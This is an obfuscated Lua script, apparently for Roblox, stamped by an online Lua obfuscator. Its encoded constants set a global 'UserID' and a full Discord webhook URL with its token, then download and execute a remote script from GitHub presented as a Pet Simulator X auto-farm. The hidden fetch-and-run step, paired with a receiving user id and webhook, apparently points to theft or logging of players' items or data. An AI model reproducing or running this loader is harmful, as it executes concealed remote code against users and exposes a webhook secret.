--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v91=v5(v82,v19);v19=nil;return v91;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=1637 -(1523 + 114) ;local v84;while true do if (v83==(0 -(0 -0))) then v84=(v31/((5 -3)^(v32-(1066 -(68 + (1347 -(87 + 263)))))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + (244 -(67 + 113)))))) + (932 -((1583 -726) + 74)))) ;return v84-(v84%(569 -(367 + 201))) ;end end else local v85=(680 + 247) -((525 -311) + 713) ;local v86;while true do if (v85==(0 + 0)) then v86=(1 + 1)^(v32-1) ;return (((v31%(v86 + v86))>=v86) and (1 + 0)) or (877 -(282 + 595)) ;end end end end local function v21()local v34=0 + 0 + 0 ;local v35;while true do if (v34==(3 -2)) then return v35;end if (v34==(952 -(802 + 150))) then v35=v1(v16,v18,v18);v18=v18 + (2 -1) ;v34=1 -0 ;end end end local function v22()local v36=997 -(915 + 82) ;local v37;local v38;while true do if (v36==(2 -1)) then return (v38 * (45 + (229 -(10 + 8)))) + v37 ;end if (v36==((0 -0) + 0)) then v37,v38=v1(v16,v18,v18 + (2 -0) );v18=v18 + (793 -(368 + 423)) ;v36=1188 -(1069 + 118) ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + (445 -(416 + 26)) );v18=v18 + (12 -8) ;return (v42 * (7199968 + 9577248)) + (v41 * 65536) + (v40 * 256) + v39 ;end local function v24()local v43=v23();local v44=v23();local v45=1 -0 ;local v46=(v20(v44,439 -((1225 -(1020 + 60)) + 293) ,450 -((1467 -(630 + 793)) + 386) ) * ((1488 -(998 + 488))^32)) + v43 ;local v47=v20(v44,21,31);local v48=((v20(v44,11 + 21 )==(1 + 0)) and  -(773 -(201 + 571))) or (1139 -((392 -276) + 1022)) ;if (v47==(0 -(0 -0))) then if (v46==0) then return v48 * 0 ;else local v92=0 + 0 ;while true do if (v92==(0 -(0 + 0))) then v47=1;v45=0 -0 ;break;end end end elseif (v47==(2906 -(814 + 45))) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(1908 -(261 + (2148 -1524))) ) * (v45 + (v46/(((1750 -(760 + 987)) -1)^(1965 -(1789 + 124))))) ;end local function v25(v49)local v50;if  not v49 then local v87=766 -(745 + 21) ;while true do if (v87==(0 + 0 + 0)) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;local v51={};for v66=3 -(2 + 0) , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (2==v52) then v57=nil;v58=nil;v52=3 + 0 ;end if (v52~=1) then else v55=nil;v56=nil;v52=4 -2 ;end if (v52~=0) then else v53=0;v54=nil;v52=1;end if ((10 -7)~=v52) then else v59=nil;while true do local v93=867 -(550 + 317) ;while true do if (1==v93) then if (v53==(0 -0)) then local v100=0 -0 ;while true do if (v100~=0) then else local v145=0 -0 ;while true do if (v145~=(286 -(134 + 151))) then else v100=1;break;end if (v145~=(1665 -(970 + 695))) then else v54={};v55={};v145=1;end end end if (v100~=1) then else local v146=0;while true do if (v146==1) then v100=2;break;end if (v146~=(0 -0)) then else v56={};v57={v54,v55,nil,v56};v146=1;end end end if (v100~=(1992 -(582 + 1408))) then else v53=3 -2 ;break;end end end break;end if (v93~=0) then else if (v53~=2) then else local v101=0 -0 ;while true do if (v101==1) then return v57;end if (v101~=(0 -0)) then else for v149=1,v23() do local v150=0;local v151;while true do if (0==v150) then v151=v21();if (v20(v151,1,1)~=(1824 -(1195 + 629))) then else local v163=0 -0 ;local v164;local v165;local v166;local v167;while true do if (v163~=(242 -(187 + 54))) then else v166=nil;v167=nil;v163=782 -(162 + 618) ;end if ((2 + 0)==v163) then while true do if (v164~=(0 + 0)) then else local v168=0 -0 ;while true do if (v168==1) then v164=1;break;end if (v168~=(0 -0)) then else v165=v20(v151,2,1 + 2 );v166=v20(v151,1640 -(1373 + 263) ,1006 -(451 + 549) );v168=1 + 0 ;end end end if (v164==3) then if (v20(v166,3,4 -1 )==1) then v167[4]=v59[v167[6 -2 ]];end v54[v149]=v167;break;end if (v164~=(1385 -(746 + 638))) then else local v170=0 + 0 ;while true do if ((0 -0)==v170) then v167={v22(),v22(),nil,nil};if (v165==(1581 -(1535 + 46))) then local v175=0;while true do if (v175==(0 + 0)) then v167[3]=v22();v167[1 + 3 ]=v22();break;end end elseif (v165==1) then v167[563 -(306 + 254) ]=v23();elseif (v165==(1 + 1)) then v167[5 -2 ]=v23() -((1469 -(899 + 568))^(11 + 5)) ;elseif (v165~=(7 -4)) then else local v184=0;local v185;local v186;while true do if (v184==1) then while true do if (v185==(603 -(268 + 335))) then v186=290 -(60 + 230) ;while true do if ((572 -(426 + 146))~=v186) then else v167[3]=v23() -(2^(2 + 14)) ;v167[1460 -(282 + 1174) ]=v22();break;end end break;end end break;end if (v184==0) then v185=0;v186=nil;v184=1;end end end v170=1;end if (v170==(812 -(569 + 242))) then v164=2;break;end end end if (v164==2) then local v171=0 -0 ;local v172;while true do if (v171==0) then v172=0;while true do if (v172==(0 + 0)) then if (v20(v166,1025 -(706 + 318) ,1)~=1) then else v167[1253 -(721 + 530) ]=v59[v167[2]];end if (v20(v166,1273 -(945 + 326) ,2)~=(2 -1)) then else v167[3 + 0 ]=v59[v167[3]];end v172=701 -(271 + 429) ;end if (v172==(1 + 0)) then v164=1503 -(1408 + 92) ;break;end end break;end end end end break;end if (v163~=(1086 -(461 + 625))) then else v164=0;v165=nil;v163=1289 -(993 + 295) ;end end end break;end end end for v152=1,v23() do v55[v152-(1 + 0) ]=v28();end v101=1172 -(418 + 753) ;end end end if ((1 + 0)~=v53) then else local v102=0;while true do if (v102==0) then v58=v23();v59={};v102=1;end if (v102~=(1 + 0)) then else for v154=1 + 0 ,v58 do local v155=0 + 0 ;local v156;local v157;while true do if (v155==0) then v156=v21();v157=nil;v155=1;end if (v155==(530 -(406 + 123))) then if (v156==(1770 -(1749 + 20))) then v157=v21()~=(0 + 0) ;elseif (v156==2) then v157=v24();elseif (v156~=(1325 -(1249 + 73))) then else v157=v25();end v59[v154]=v157;break;end end end v57[3]=v21();v102=2;end if (v102==2) then v53=2;break;end end end v93=1 + 0 ;end end end break;end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v88=0,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + 1 ];else v78[v88]=v75[v88 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=5) then if (v81<=2) then if (v81<=0) then for v103=v80[2],v80[3] do v78[v103]=nil;end elseif (v81>1) then local v105=v80[2];local v106=v78[v80[3]];v78[v105 + 1 ]=v106;v78[v105]=v106[v80[4]];elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=3) then local v98=v80[2];v78[v98]=v78[v98](v13(v78,v98 + 1 ,v73));elseif (v81>4) then local v110=0;local v111;local v112;local v113;local v114;while true do if (v110==2) then for v159=v111,v73 do v114=v114 + 1 ;v78[v159]=v112[v114];end break;end if (v110==1) then v73=(v113 + v111) -1 ;v114=0;v110=2;end if (v110==0) then v111=v80[2];v112,v113=v71(v78[v111](v13(v78,v111 + 1 ,v80[3])));v110=1;end end else do return;end end elseif (v81<=8) then if (v81<=6) then v78[v80[2]]();elseif (v81>7) then local v115;local v116,v117;local v118;local v119;v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v119=v80[2];v118=v78[v80[3]];v78[v119 + 1 ]=v118;v78[v119]=v118[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v119=v80[2];v116,v117=v71(v78[v119](v13(v78,v119 + 1 ,v80[3])));v73=(v117 + v119) -1 ;v115=0;for v142=v119,v73 do v115=v115 + 1 ;v78[v142]=v116[v115];end v72=v72 + 1 ;v80=v68[v72];v119=v80[2];v78[v119]=v78[v119](v13(v78,v119 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v72=v80[3];else v72=v80[3];end elseif (v81<=10) then if (v81==9) then v78[v80[2]][v80[3]]=v80[4];else v78[v80[2]]=v80[3];end elseif (v81>11) then v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v72=v80[3];else v78[v80[2]]=v62[v80[3]];end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403513O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F72584175746F4661726D2F6D61696E2F48617374654661726D2E6C756103023O005F4703063O00557365724944023O00F80B9EDD4103073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3135302O313538373638392O3336383335302F6D6E5F465169583947454776683661477A5F64565A57596446506F58417550636E6842366443664E32763858643666616A2D532D5834625F6E71576874614C536B725668001A3O00120A3O00016O000100013O0026013O0002000100010004073O0002000100120A000100013O0026010001000F000100020004073O000F000100120B000200033O001208000300043O00202O00030003000500122O000500066O000300056O00023O00024O00020001000100044O0019000100260100010005000100010004073O0005000100120B000200073O00300C00020008000900122O000200073O00302O0002000A000B00122O000100023O00044O000500010004073O001900010004073O000200012O00043O00017O00",v9(),...);
